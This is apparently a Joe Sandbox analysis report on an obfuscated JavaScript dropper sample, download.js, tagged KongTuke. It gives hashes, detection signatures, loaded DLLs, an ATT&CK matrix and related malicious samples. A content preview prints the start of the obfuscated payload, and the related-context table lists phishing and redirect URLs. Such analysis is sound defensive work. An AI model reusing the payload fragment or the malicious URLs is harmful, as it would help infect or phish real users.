Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.js

Overview

General Information

Sample name:download.js
Analysis ID:1559079
MD5:52b60ab7647a4b961750913c1a7f463e
SHA1:84502679245bc248eb7330befe357ca585250f77
SHA256:3875569ab86e993bbe433c96aca46fa7f6352e22b03bc8fddf3c3bb5e78b2982
Tags:jsKongTukeuser-monitorsg
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6336, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6336, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: download.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: sus22.winJS@1/0@0/0
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping2
System Information Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0017.t-0009.t-msedge.net
13.107.246.45
truefalse
    high
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1559079
    Start date and time:2024-11-20 06:58:13 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 2m 8s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:3
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:download.js
    Detection:SUS
    Classification:sus22.winJS@1/0@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .js
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
    • Excluded IPs from analysis (whitelisted): 40.69.42.241
    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
    No simulations
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaCBrowse
    • 13.107.246.45
    https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaCBrowse
    • 13.107.246.45
    https://estudioit.cl/starl/#ZGVicmEuY2FydGVyQGNhc2EuZ292LmF1Get hashmaliciousUnknownBrowse
    • 13.107.246.45
    http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaCBrowse
    • 13.107.246.45
    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
    • 13.107.246.45
    No context
    No context
    No context
    No created / dropped files found
    File type:ASCII text, with very long lines (12816), with CRLF line terminators
    Entropy (8bit):6.022231430727384
    TrID:
      File name:download.js
      File size:22'364 bytes
      MD5:52b60ab7647a4b961750913c1a7f463e
      SHA1:84502679245bc248eb7330befe357ca585250f77
      SHA256:3875569ab86e993bbe433c96aca46fa7f6352e22b03bc8fddf3c3bb5e78b2982
      SHA512:f9a6c3c4343ebe4d892107ef6b802fc3993b276cdc4632fc09841db1ef5816fe9fedcc9c85d3b0c19811d5d74c2dbc5300aeddf91b0256a798b46fa5f8a12a49
      SSDEEP:384:Ml50s+G3DtjvsKMEv11xlqohOTe0qI9/yXo8L1H3lFM+Yoh0ZB0WEd:O50s+aD+nEv11hN3I9Z8L1HVFMIWD0H
      TLSH:7EA27EF16B8CDCE2018D4BAEDF075C04BD36543AA0ABABC5F084D9807391645AE4FD97
      File Content Preview:$qoxhknu=$executioncontext;$tionisenesbeeresertionatanared = (-JOIn (@((433063/(10903-(-4629+7361))),(9632-9580),(5264-5207),(285500/5710),(-3475+3531),(2570-(-6188+(18675-(10136-165)))),(205912/(944989/(-1798+(-7497+(13440-(36181728/9306)))))),(5583-(631
      Icon Hash:68d69b8bb6aa9a86
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Nov 20, 2024 06:59:17.793275118 CET1.1.1.1192.168.2.60x983cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
      Nov 20, 2024 06:59:17.793275118 CET1.1.1.1192.168.2.60x983cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:00:59:18
      Start date:20/11/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"
      Imagebase:0x7ff6c3bb0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      No disassembly